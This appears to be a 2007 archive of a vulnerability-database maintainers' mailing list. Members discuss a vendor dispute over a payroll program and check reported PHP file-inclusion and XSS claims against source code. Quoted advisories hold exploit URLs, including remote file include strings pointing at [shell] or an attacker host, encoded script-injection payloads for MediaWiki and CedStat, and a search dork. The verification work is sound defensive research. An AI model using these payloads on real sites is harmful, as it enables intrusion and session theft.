> 4.2.20... Update to version 4.2.22." Which sure sounds to me like there
> used to be an issue and now there isn't. Does anybody know of a changelog
> entry?
>
> I eagerly await their reply.
>
> By the way - does anybody record retracted disputes? We have "* DISPUTED
> *" in the description only while the dispute is active, but I know we've
> had a number of retractions.
>
> - Steve
>

We got the same message. I removed the ISS entry, because on our side, the broken link doesn't do us much good. I'll happily re-add it if the entry re-appears. Google cache still has the entry, and it's basically the same information as what we both have.

I asked him to clarify his problem between Secunia's description and ours. I can't imagine we'll be moved by his arguments. Sullo posted a changelog entry earlier that indicated they added ineffective encryption in 4.2.21 and then fixed the encryption for 4.2.22.

Steve
osvdb.org

From coley at linus.mitre.org Thu Feb 15 19:10:40 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 15 Feb 2007 19:10:40 -0500 (EST)
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To: <45D4F464.8070303@vitriol.net>
References: <200702151111.30531.aviram@beyondsecurity.com> <45D4F464.8070303@vitriol.net>
Message-ID:

On Thu, 15 Feb 2007, Steve Tornio wrote:

> I asked him to clarify his problem between Secunia's description and
> ours. I can't imagine we'll be moved by his arguments. Sullo posted a
> changelog entry earlier that indicated they added ineffective encryption
> in 4.2.21 and then fixed the encryption for 4.2.22.

Whoops, somehow missed that one, thanks.

- Steve

From theall at tenablesecurity.com Thu Feb 15 19:38:56 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 15 Feb 2007 19:38:56 -0500
Subject: [VIM] RSSMini Exploit -- Probably Not
In-Reply-To:
References: <45D4C53F.5080104@tenablesecurity.com>
Message-ID: <45D4FD20.9000106@tenablesecurity.com>

Steven M. Christey wrote:
> I can't believe this... the application doesn't exit on a failed include?

This is the difference between include() and require() -- the latter exits while the former doesn't.

George
--
theall at tenablesecurity.com

From steve at vitriol.net Thu Feb 15 20:22:32 2007
From: steve at vitriol.net (Steve Tornio)
Date: Thu, 15 Feb 2007 19:22:32 -0600
Subject: [VIM] [OSVDB Mods] [Change Request] 23617: Kwik-Pay Payroll KwikPay.mdb Information Disclosure
In-Reply-To: <1171582476.45d4ee0c705f2@email.ixwebhosting.com>
References: <1171581210.45d4e91a0f10e@mail.opentransfer.com> <45D4EA55.3000005@vitriol.net> <1171582476.45d4ee0c705f2@email.ixwebhosting.com>
Message-ID: <45D50758.3080500@vitriol.net>

Kwik-Pay Support wrote:
> It's just that the kwikpay.mdb file contains fictitious demonstration data - not
> any sensitive employment or payment related data. It implies that a file that
> was never intended to be secured should be secured.

So, your objection is due to the inclusion of an actual filename?
We're all agreed that the contents of databases prior to version 4.2.22 were trivially accessible to a local user?

>
> It only applies if the user themselves create their own payroll database in the
> installation directory. The software itself does not force any user payroll
> database to be created there - it is only created there if the user specifically
> requests it!
>
> I'd prefer if the whole report was removed as we believe that it was created by
> people who did not understand how the system worked, and did not even contact us
> to find out before they created the report!

If the databases are trivially accessible by local users, then the entry will certainly stay. Most installations will follow the path of least resistance, and unless the program requires an encrypted database, then this is a legitimate concern.

>
> p.s. I had some correspondence with Brian yesterday. Is he always so offensive?
>

OSVDB is a volunteer effort, staffed by people whose only goal is to provide a comprehensive, accurate database of reported computer and network security vulnerabilities. Brian has been a key force in making our database as complete and accurate as we can make it, with no compensation and little recognition. I'm proud to work with him for an equivalent amount of compensation and recognition.

So, when we are approached by someone, and the very first accusatory words of his email are, "It has just been brought to our attention that you have created this 'security problem' regarding our software," we don't feel the need to mince words. The vulnerability was created by an oversight in the development of the application, it was reported by independent researchers, and then recorded in our database, as accurately as we are able. We are happy to correct errors in the database. We are not as happy to take ill-founded abuse as we do it.

I will update our description to remove the offending file name, as it sounds like a more accurate description of the vulnerability.
Thanks,
Steve Tornio
osvdb.org

From sullo at cirt.net Thu Feb 15 22:26:50 2007
From: sullo at cirt.net (Sullo)
Date: Thu, 15 Feb 2007 22:26:50 -0500
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To:
References: <200702151111.30531.aviram@beyondsecurity.com>
Message-ID: <45D5247A.1040901@cirt.net>

Steven M. Christey wrote:
> Well, I just got another email from the developer asking me to remove the
> X-Force item that was apparently deleted
>

So, two things... the real question (in my mind), is *why* did ISS remove their entry, just because the vendor said to? And secondly, if the Kwik-Pay person's goal is to keep the issue hush-hush and get it off the internets, I wonder if he's noticed the VIM archives over on attrition.org... :-)

--
http://www.cirt.net/ | http://www.osvdb.org/

From steve at vitriol.net Thu Feb 15 22:35:02 2007
From: steve at vitriol.net (Steve Tornio)
Date: Thu, 15 Feb 2007 21:35:02 -0600
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To: <45D5247A.1040901@cirt.net>
References: <200702151111.30531.aviram@beyondsecurity.com> <45D5247A.1040901@cirt.net>
Message-ID: <45D52666.9030109@vitriol.net>

Sullo wrote:
> And secondly, if
> the Kwik-Pay person's goal is to keep the issue hush-hush and get it off
> the internets, I wonder if he's noticed the VIM archives over on
> attrition.org... :-)
>
>

I've actually had a little bit of an email exchange, and he's a lost cause. Somehow, the fact that OSVDB included the filename of the default database as a vector is a cardinal sin, and horrifyingly inaccurate, but databases existing unencrypted and available to any local user isn't a big deal. So, I modified the entry to be more like Secunia, and state that all databases are trivially available, and that's somehow better in his mind.

Oh well, he also said I need to find a more productive use of my time.
Like not continuing my discussion with him, I think :)

Steve

From coley at linus.mitre.org Fri Feb 16 01:40:09 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 16 Feb 2007 01:40:09 -0500 (EST)
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To: <45D52666.9030109@vitriol.net>
References: <200702151111.30531.aviram@beyondsecurity.com> <45D5247A.1040901@cirt.net> <45D52666.9030109@vitriol.net>
Message-ID:

On Thu, 15 Feb 2007, Steve Tornio wrote:

> Oh well, he also said I need to find a more productive use of my time.
> Like not continuing my discussion with him, I think :)

There I go, not having an opinion again.

- Steve

From jms at bughunter.ca Fri Feb 16 03:07:23 2007
From: jms at bughunter.ca (Justin Seitz)
Date: Fri, 16 Feb 2007 02:07:23 -0600 (CST)
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To:
References: <200702151111.30531.aviram@beyondsecurity.com> <45D5247A.1040901@cirt.net> <45D52666.9030109@vitriol.net>
Message-ID: <1834.24.70.141.188.1171613243.squirrel@mail.bughunter.ca>

Ok, this is my favourite of all time:

  Note that an encrypted Kwik-Pay database cannot be compressed by the
  backup process in Kwik-Pay and therefore will not fit on a floppy disk.

  The password you enter will be requested every time you open the payroll.
  If you forget the password you will not be able to access the data.

  To unencrypt an encrypted Kwik-Pay database, leave the password blank and
  then click OK.

So 1) if you encrypt NO backup 2) to decrypt just leave the password blank......wow....and this 'dude' was acting very undudely over a filename? Best not be messin' with them OSVDB gangstas.

JS

> On Thu, 15 Feb 2007, Steve Tornio wrote:
>
>> Oh well, he also said I need to find a more productive use of my time.
>> Like not continuing my discussion with him, I think :)
>
> There I go, not having an opinion again.
>
> - Steve

From ge at linuxbox.org Fri Feb 16 03:04:45 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Fri, 16 Feb 2007 02:04:45 -0600 (CST)
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To: <1834.24.70.141.188.1171613243.squirrel@mail.bughunter.ca>
Message-ID:

On Fri, 16 Feb 2007, Justin Seitz wrote:
> Ok, this is my favourite of all time:
>
> Note that an encrypted Kwik-Pay database cannot be compressed by the
> backup process in Kwik-Pay and therefore will not fit on a floppy disk.
>
> The password you enter will be requested every time you open the payroll.
> If you forget the password you will not be able to access the data.
>
> To unencrypt an encrypted Kwik-Pay database, leave the password blank and
> then click OK.
>
> So 1) if you encrypt NO backup 2) to decrypt just leave the password
> blank......wow....and this 'dude' was acting very undudely over a
> filename? Best not be messin' with them OSVDB gangstas.

One time I was doing forensics on a win95 box. I thought: hey, there gotta be a way to get around the password protection without shutting it off.. Then we clicked on ESC.

> JS
>
> [...]

From coley at linus.mitre.org Fri Feb 16 03:26:36 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 16 Feb 2007 03:26:36 -0500 (EST)
Subject: [VIM] [OT] Beers in Virginia
In-Reply-To: <200702151644.41207.aviram@beyondsecurity.com>
References: <200702151644.41207.aviram@beyondsecurity.com>
Message-ID:

I expect to be at Black Hat Federal around Feb 28-Mar 1 (I'm fuzzy on the dates), maybe we could set something up then? I'm not sure who else on the list is in the VA area.
- Steve

From theall at tenablesecurity.com Fri Feb 16 12:37:02 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 16 Feb 2007 12:37:02 -0500
Subject: [VIM] PBLang 4.60 <= (index.php) Remote File Include Vulnerability
Message-ID: <45D5EBBE.80408@tenablesecurity.com>

This concerns the remote file include reported in PBLang here:

  http://www.securityfocus.com/archive/1/460315/30/0/threaded

The code in index.php starts with:

  require ('header.php');
  include("global.php");
  include($dbpath."/settings.php");

header.php just sets some http headers, starts a session, and other sorts of housekeeping; it doesn't reference $dbpath or include other files. global.php doesn't exist out of the box but gets created as part of the install to initialize constants, including $dbpath. At least as created, it does not give a remote user any way to overwrite the setting for $dbpath or use it, even indirectly. So this report looks bogus to me.

Btw, the download link in the advisory leads to version 4.65 as part of the enclosed docs/PBLang-update.txt (look at the bottom), not 4.60 as claimed in the posting.
George
--
theall at tenablesecurity.com

From smoore at securityglobal.net Fri Feb 16 14:16:38 2007
From: smoore at securityglobal.net (Stuart Moore)
Date: Fri, 16 Feb 2007 14:16:38 -0500
Subject: [VIM] false: Plume CMS 1.2.2 < = RFi Vulnerabilities
Message-ID: <45D60316.1040101@securityglobal.net>

plume\manager\articles.php:

  require_once 'path.php';
  require_once $_PX_config['manager_path'].'/prepend.php';
  require_once $_PX_config['manager_path'].'/inc/class.article.php';

path.php:

  $_PX_config['manager_path'] = dirname(__FILE__);

Stuart

------
##################################################################
#Plume CMS 1.2.2 < = RFi Vulnerabilities
#Download : http://prdownloads.sourceforge.net/pxsystem/plume-1.2.2.zip?download
#Script Name : Plume CMS 1.2.2
##################################################################
#Coded By : KaRTaL
#Contact : k4rtal[at]gmail[dot]com
##################################################################
#V.Code in : plume\manager\articles.php
#
# require_once $_PX_config['manager_path'].'/inc/class.article.php';
#
#Exploit : www.target.com/manager/articles.php?_PX_config[manager_path]=[shell]
##################################################################
#Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , Gurkan142 , www.istikla-team.org
##################################################################

From theall at tenablesecurity.com Fri Feb 16 14:51:40 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 16 Feb 2007 14:51:40 -0500
Subject: [VIM] false: Drake CMS v0.3.2 < = RFi Vulnerabilities
Message-ID: <45D60B4C.7030702@tenablesecurity.com>

Source for 0.3.2 can be obtained from:

  http://puzzle.dl.sourceforge.net/sourceforge/drakecms/drake_0.3.2_beta_rev1306.tar.gz

admin/includes/header.php starts with:

Message-ID:

The download link is for the wrong app, but dotclear 1.2.5 is pretty clearly the app being talked about.
index.php includes:

  # Path to the application root (if you move the file)
  $app_path = '/';

  # If, for example, you put blog.php at the root of your site and DotClear
  # is in /dotclear, you can uncomment this line:
  //$app_path = '/dotclear/';

  # DO NOT CHANGE ANYTHING AFTER THIS LINE
  $blog_file_path = __FILE__;
  $blog_dc_path = dirname(__FILE__).$app_path;

  require $blog_dc_path.'/layout/prepend.php';
  include $dc_template_file;
  require $blog_dc_path.'/layout/append.php';

1. $blog_dc_path is clearly defined
2. $dc_template_file is defined in layout/prepend.php, built from the previously-defined $blog_dc_path
3. prepend.php includes a bunch of stuff using dirname(__FILE__) - none of those files include/require other files
4. append.php only closes a filehandle.

index.php?blog_dc_path isn't an issue, and it doesn't look like other variables are either.

Begin forwarded message:

> From: k4rtal at gmail.com
> Date: 17 February , 2007 02:59:07 MST (CA)
> To: bugtraq at securityfocus.com
> Subject: DotClear v1.2.5
> Message-Id: <20070217095907.30235.qmail at securityfocus.com>
>
> #################################################################
> #DotClear v1.2.5 < = RFi Vulnerabilities ( KaRTaL )
> #Download : http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111
> #Script Name : DotClear v1.2.5
> #################################################################
> #Coded By : KaRTaL
> #Contact : k4rtal[at]gmail[dot]com
> #################################################################
> #V.Code in : [path]/index.php
> #
> # require $blog_dc_path.'/layout/append.php';
> #
> #Exploit : www.target.com/path/index.php?blog_dc_path=[shell]
> #################################################################
> #Gretz : Doublekickx , D3ngsz , ERNE , DermanTurK , M3rhametsiz , CaCa , Gurkan142 , www.istikla-team.org
> #################################################################

--
Brent Graveland
brentg at securityfocus.com

From jericho at attrition.org Tue Feb 20 02:01:37 2007
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 20 Feb 2007 02:01:37 -0500 (EST)
Subject: [VIM] 26226: abarcar Realty Portal content.php cat Variable SQL Injection (fwd)
Message-ID:

---------- Forwarded message ----------
From: Helmut P. Fleischhauer
To: moderators at osvdb.org
Date: Sat, 02 Dec 2006 18:21:25 +0100
Reply-To: moderators at osvdb.org
Subject: [OSVDB Mods] [Change Request] 26226: abarcar Realty Portal content.php cat Variable SQL Injection

1. The current version of the software is 7.2. Since version 7.0, released over 6 months ago, static pages are created and no appended values are used.
2. The version 5.1.5 has not been in use since the end of 2003.
3. The above test was NOT made with a Realty Portal package as there is no package of this version available online. Referring to the Realty Portal software is false.
4. abarcar Software was not informed prior to publication.

Sincerely
Helmut P. Fleischhauer

abarcar Software
Mulknitzer Dorfstr. 11
03149 Forst
Germany
Phone.: +49 3562 693532
info at abarcar.com
http://www.abarcar.com

From noamr at beyondsecurity.com Tue Feb 20 05:07:11 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Tue, 20 Feb 2007 12:07:11 +0200
Subject: [VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities
Message-ID: <200702201207.12015.noamr@beyondsecurity.com>

Hi,

Vendor appears to confirm problem:
----------------------
Meganoide's news v1.1.2
-----------------------
- Bug: possibile inclusione di file remoti nel file "include.php"

(Translation from Italian: possible inclusion of remote files in the file "include.php")

---------- Forwarded Message ----------

Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities
Date: Friday 16 February 2007 19:54
From: k4rtal at gmail.com
To: bugtraq at securityfocus.com

##################################################################
#Meganoide's news v1.1.1 < = RFi Vulnerabilities
#Download : http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111
#Script Name : Meganoide's news v1.1.1
##################################################################
#Coded By : KaRTaL
#Contact : k4rtal[at]gmail[dot]com
##################################################################
#V.Code in : [path]/include.php
#
# include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php");
#
#Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
##################################################################
#Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , Gurkan142 , www.istikla-team.org
##################################################################

-------------------------------------------------------

--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

From noamr at beyondsecurity.com Tue Feb 20 06:07:06 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Tue, 20 Feb 2007 13:07:06 +0200
Subject: [VIM] [TRUE] CedStat v1.31 XSS
Message-ID: <200702201307.06935.noamr@beyondsecurity.com>

Hi,

The vulnerability is true - found it on the Internet; the product appears to be "non-existing" or at least no longer available.

BTW: Accessing http://intranet.ac-nancy-metz.fr/cedstat/ returns:

  Perdu sur l'Internet ? Pas de panique, on va vous aider
  * <----- vous êtes ici

  (Lost on the Internet? Don't panic, we'll help you. * <----- you are here)

Anyone read French?

---------- Forwarded Message ----------

Subject: CedStat v1.31 XSS
Date: Friday 16 February 2007 00:30
From: sn0oPy.team at gmail.com
To: bugtraq at securityfocus.com

* CedStat v1.31 XSS
* By : sn0oPy
* Risk : low
* site : http://cedtat.free.fr
* exploit : http://www.target.ma/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E

Dork : inurl:"/cedstat/"

* contact : sn0oPy at avenir-geopolitique.net
* greetz : [subzero], http://forums.avenir-geopolitique.net.

reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2672

-------------------------------------------------------

--
Noam Rathaus
noamr at beyondsecurity.com

From str0ke at milw0rm.com Tue Feb 20 12:45:05 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 20 Feb 2007 11:45:05 -0600
Subject: [VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities
In-Reply-To: <200702201207.12015.noamr@beyondsecurity.com>
References: <200702201207.12015.noamr@beyondsecurity.com>
Message-ID: <814b9d50702200945v552e4d4che718209f0b42cc22@mail.gmail.com>

_SERVER[DOCUMENT_ROOT]=[shell]

Isn't it only certain versions of PHP that are vulnerable to this kind of attack?
/str0ke

On 2/20/07, Noam Rathaus wrote:
> Hi,
>
> Vendor appears to confirm problem:
> ----------------------
> Meganoide's news v1.1.2
> -----------------------
> - Bug: possibile inclusione di file remoti nel file "include.php"
>
> (Translation from Italian: possible inclusion of remote files in the
> file "include.php")
>
> [...]

From noamr at beyondsecurity.com Tue Feb 20 13:30:23 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Tue, 20 Feb 2007 20:30:23 +0200
Subject: [VIM] [unsure] MediaWiki Cross-site Scripting
Message-ID: <200702202030.23410.noamr@beyondsecurity.com>

Anyone able to confirm this? I can't.

---------- Forwarded Message ----------

Subject: MediaWiki Cross-site Scripting
Date: Tuesday 20 February 2007 06:29
From: eyal at bugsec.com
To: bugtraq at securityfocus.com

MediaWiki Cross-site Scripting Vulnerabilities.

Date:
18/02/2007

Vendor:
MediaWiki

Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.

Description:
MediaWiki v1.8.2 and below are vulnerable to a plain Cross-site scripting attack by exploiting the experimental AJAX features, if enabled (default). This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. Note: browser encoding auto-detection has to be enabled for successful exploitation.

Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions.

Examples:

v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E

v1.8.3 - v1.9.2:
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded)

Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24

-------------------------------------------------------

--
Noam Rathaus
noamr at beyondsecurity.com

From str0ke at milw0rm.com Tue Feb 20 14:09:20 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 20 Feb 2007 13:09:20 -0600
Subject: [VIM] false: phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities
Message-ID: <814b9d50702201109h54fd6592uc2c202ddd7b9f565@mail.gmail.com>

the config.php file contains the below which pretty much blocks an RFI.

  /dev/null"; ?>

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz
Contact: ilker Kandemir
Code: include($tcmdp);
-------------------------------------------------------------------------------------------------------------------
Exploit:
phpxmmsb.php?tcmdp=http://attacker.txt?
phpxmmst.php?tcmdp=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Asianeagle,ajann,Str0ke . Special Tnx: AYYILDIZ.ORG

From sullo at cirt.net Tue Feb 20 19:09:47 2007
From: sullo at cirt.net (Sullo)
Date: Tue, 20 Feb 2007 19:09:47 -0500
Subject: [VIM] [unsure] MediaWiki Cross-site Scripting
In-Reply-To: <200702202030.23410.noamr@beyondsecurity.com>
References: <200702202030.23410.noamr@beyondsecurity.com>
Message-ID: <45DB8DCB.7020600@cirt.net>

$wgUseAjax is off by default--in fact in my install I don't even have that in the config file.

I didn't try very hard, but I couldn't get it to work either (after turning wgUseAjax on).

Noam Rathaus wrote:
> Anyone able to confirm this? I can't.
>
> [...]

--
http://www.cirt.net/ | http://www.osvdb.org/

From sullo at cirt.net Wed Feb 21 00:32:47 2007
From: sullo at cirt.net (Sullo)
Date: Wed, 21 Feb 2007 00:32:47 -0500
Subject: [VIM] [unsure] MediaWiki Cross-site Scripting
In-Reply-To: <45DB8DCB.7020600@cirt.net>
References: <200702202030.23410.noamr@beyondsecurity.com> <45DB8DCB.7020600@cirt.net>
Message-ID: <45DBD97F.4010900@cirt.net>

And I stand corrected:

  An XSS injection vulnerability based on Microsoft Internet Explorer's
  UTF-7 charset autodetection was located in the AJAX support module,
  affecting MSIE users on MediaWiki 1.6.x and up when the optional setting
  $wgUseAjax is enabled.
  ...

http://svn.wikimedia.org/svnroot/mediawiki/tags/REL1_9_3/phase3/RELEASE-NOTES

Sullo wrote:
> $wgUseAjax is off by default--in fact in my install I don't even have
> that in the config file.
>
> I didn't try very hard, but I couldn't get it to work either (after
> turning wgUseAjax on).
>
> [...]

--
http://www.cirt.net/ | http://www.osvdb.org/

From str0ke at milw0rm.com Wed Feb 21 10:46:34 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 21 Feb 2007 09:46:34 -0600
Subject: [VIM] false: Openads-2.3.31-alpha-pr2 (lib-ftp.inc.php) Remote File Include
Message-ID: <814b9d50702210746u9ccb69ia0571146d16ca3d8@mail.gmail.com>

fopen is inside of a function that is never called in the script.
/str0ke

######################################################
#
# Openads-2.3.31-alpha-pr2
#
# Class: File Include Vulnerability
# Published 2007-02-21
# Remote: Yes
# Critical Level : Dangerous
# Site: http://www.openads.org/downloads/download-openads-2.3.html
######################################################
file's ; lib-ftp.inc.php
======================================================
Vuln Code
@fopen($localfile, "w");
=======================================================
Exploit :
Http:// www.Victem.com / [Openads-2.3.31-alpha-pr2] /max-v0.3.31-alpha-pr2/www/admin/lib-ftp.inc.php?ilocalfile=shellcode

From str0ke at milw0rm.com Wed Feb 21 10:52:24 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 21 Feb 2007 09:52:24 -0600
Subject: [VIM] false: Simpleshout sboard.php Remote File Inclusion
Message-ID: <814b9d50702210752l5c0059ffr3d27fc1aa181f779@mail.gmail.com>

First lines of code are below:

  $config = "config.php";
  // Require files
  require $config;

The config variable is initialized.

/str0ke

Simpleshout sboard.php Remote File Inclusion
-==-----------------------------------------
-==-----------------------------------------
download script=http://scripts.ringsworld.com/chat-scripts/simpleshout-1.6.0
file affected:sboard.php
-==---------------------
c0de:

From: Matthew Murphy
Date: Wed, 21 Feb 2007
Subject: [VIM] CVE-2006-5823 (zlib_inflate): Alternate Vectors?

I see that some distros are just getting around to patching the zlib_inflate vulnerability (CVE-2006-5823). In the past, zlib has been associated with some major security exposures, and so it surprises me that this has been (largely) played down without attention as a bug that allows you to bring down a box by mounting a crafted file system that, oh-by-the-way, happens to use zlib.

Is anybody aware of other (promising or disastrous, depending on how you look at it) potential exploit vectors for this beyond kernel-mode file system code -- e.g., network client libraries? If not, is anyone aware of why it seems this hole got so little attention?
Is it sufficiently hard to trigger that most environments wouldn't allow exploitation?

From ge at linuxbox.org Wed Feb 21 18:30:04 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Wed, 21 Feb 2007 17:30:04 -0600 (CST)
Subject: [VIM] CVE-2006-5823 (zlib_inflate): Alternate Vectors?
In-Reply-To:
Message-ID:

As a general note on our unrelated conversation, Matt: the Vista issue is serious.

On Wed, 21 Feb 2007, Matthew Murphy wrote:
> I see that some distros are just getting around to patching the
> zlib_inflate vulnerability (CVE-2006-5823). In the past, zlib has
> been associated with some major security exposures, and so it
> surprises me that this has been (largely) played down without
> attention as a bug that allows you to bring down a box by mounting a
> crafted file system that, oh-by-the-way, happens to use zlib.
>
> Is anybody aware of other (promising or disastrous, depending on how
> you look at it) potential exploit vectors for this beyond kernel-mode
> file system code -- e.g., network client libraries? If not, is anyone
> aware of why it seems this hole got so little attention? Is it
> sufficiently hard to trigger that most environments wouldn't allow
> exploitation?

From jericho at attrition.org Wed Feb 21 23:46:36 2007
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 21 Feb 2007 23:46:36 -0500 (EST)
Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541)
In-Reply-To:
References: <200612261947.kBQJldde021373@faron.mitre.org>
Message-ID:

Late reply I know but..

: Here's a vendor URL containing the dispute:
:
: http://www.smileygenerator.us/sales/index.php?act=viewProd&productId=8
:
: Security reports of file include vulnerabilities for the Animated Smiley
: Generator are applicable only to the "nulled" version of this
: application being circulated by warez sites. Legitimate copies will not
: allow this exploit!

Curious how this came to be.
Did someone add a vulnerability to a copy before sharing it and letting it circulate in the warez circles?

From coley at mitre.org Thu Feb 22 00:30:19 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 22 Feb 2007 00:30:19 -0500 (EST)
Subject: [VIM] Source verify and clarification of old bookmark4u SQL injection
Message-ID: <200702220530.l1M5UJn7018212@faron.mitre.org>

Ref: FULLDISC:20060420 Sql Injection in BookMark4u
URL: http://marc.theaimsgroup.com/?l=full-disclosure&m=114555163911635&w=2

1) This is abandonware. Last version was in 2003 and site says "This Project will NOT be updated ANY MORE." See:

   http://sourceforge.net/project/showfiles.php?group_id=29784

2) Some VDBs mention the "mode" parameter being affected, but this appears erroneous. The only mentions of $mode in config.php are:

   $mode = $HTTP_POST_VARS[mode];
   ...
   if ($mode == 'sqlexec') {

3) sqlcmd vector verified by source inspection:

   $sqlcmd = $HTTP_POST_VARS[sqlcmd];
   ...
   if ($mode == 'sqlexec') {
     if (get_magic_quotes_gpc()) {
       $sqlcmd = ereg_replace("\\\\", "", $sqlcmd);
     }
     $qry = ereg_replace("%NL%", "\n", $sqlcmd); # decode newline(\n) chars
     ...
     $qry_list = explode(";", $qry); # split multiple queries
     for ($i = 0; $i < sizeof($qry_list); $i++) {
       $qry_one = trim($qry_list[$i]);
       if (!$qry_one) continue;
       $adminMgr->executeMiscQuery($qry_one);

You know the rest. Bill H will no doubt love the "%NL%" touch.

At first glance, this didn't seem to require authentication or authorization, but I didn't look too close.

4) As might be expected for ancient PHP code, be careful when you look at the source, or you might step in some RFI.

- Steve

From coley at linus.mitre.org Thu Feb 22 00:41:19 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 22 Feb 2007 00:41:19 -0500 (EST)
Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541)
In-Reply-To:
References: <200612261947.kBQJldde021373@faron.mitre.org>
Message-ID:

On Wed, 21 Feb 2007, security curmudgeon wrote:

> Curious how this came to be. Did someone add a vulnerability to a copy
> before sharing it and letting it circulate in the warez circles?

I'm pretty sure this wasn't the first, nor the last, case of a vulnerability in a Trojaned warez product that wasn't in the legitimate product (assuming the vendor dispute is correct). Maybe some of our disputes are actually assuming legitimate distributions.

I don't think CVE should be tracking malicious modifications from unofficial channels. Now, if a product is trojaned at its legitimate distribution point, that's of concern to consumers and gets a CVE. But modified warez falls under the malware category, for me anyway. Would OSVDB be interested in cataloging vulnerabilities in malware? They're technically vulnerabilities from the malware's point of view, after all ;-)

Gadi - any insights into warez backdoors? I know I've run into one or two PHP warez sites out there.

- Steve

From jericho at attrition.org Thu Feb 22 00:47:06 2007
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 22 Feb 2007 00:47:06 -0500 (EST)
Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541)
In-Reply-To:
References: <200612261947.kBQJldde021373@faron.mitre.org>
Message-ID:

: > Curious how this came to be. Did someone add a vulnerability to a copy
: > before sharing it and letting it circulate in the warez circles?
:
: I'm pretty sure this wasn't the first, nor the last, case of a
: vulnerability in a Trojaned warez product that wasn't in the legitimate
: product (assuming the vendor dispute is correct). Maybe some of our
: disputes are actually assuming legitimate distributions.

This came to mind and was part of the reason I asked.
We know that a lot of vulnerabilities are discovered by testing live sites. We know that there is a lot of animosity and petty revenge in the world of hackers. We also know that a lot of hackers don't always opt to pay for software. Add it all up and I have to wonder if some of the warez versions are being backdoored in this manner to help avoid any accusation that it was done on purpose, and then later being discovered when one tries to hack another.

: I don't think CVE should be tracking malicious modifications from
: unofficial channels. Now, if a product is trojaned at its legitimate
: distribution point, that's of concern to consumers and gets a CVE. But

Right, I'd definitely track such occurrences if a legitimate distro is backdoored in such a fashion.

: modified warez falls under the malware category, for me anyway. Would
: OSVDB be interested in cataloging vulnerabilities in malware? They're
: technically vulnerabilities from the malware's point of view, after all
: ;-)

If the software is being distributed, even via warez channels, and installed and used on real servers with net access, it seems just as valid as any other distribution with a vulnerability. I would also say that if it is known to only affect a given distro, then it should certainly be noted in the VDB entry.

From ge at linuxbox.org Thu Feb 22 03:20:48 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Thu, 22 Feb 2007 02:20:48 -0600 (CST)
Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541)
In-Reply-To:
Message-ID:
